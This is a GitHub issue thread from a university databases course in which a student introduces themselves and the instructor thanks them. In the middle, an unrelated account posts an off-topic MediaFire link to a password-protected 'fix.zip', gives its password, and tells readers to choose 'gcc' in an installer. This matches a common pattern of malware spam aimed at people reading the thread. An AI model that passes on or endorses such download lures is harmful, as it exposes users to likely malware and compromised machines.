### ISSUE TITLE
Tópico 01

### ISSUE THREAD

**Issue by LuizGDC7** [plinioleitao/bd-2024-2-bcc#10]
Meu registro acadêmico: 202301467

Minha conta no GitHub: https://github.com/LuizGDC7

Minhas expectativas com respeito à disciplina: gostaria de aprender aprofundadamente sobre o funcionamento de banco de dados relacionais e não relacionais. Além disso, gostaria de ser capaz de construir meu próprio banco de dados. Se possível, gostaria de uma abordagem que levasse em consideração o uso de banco de dados no mercado de trabalho.

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by plinioleitao** [comment]
Obrigado pela resposta e comentários.
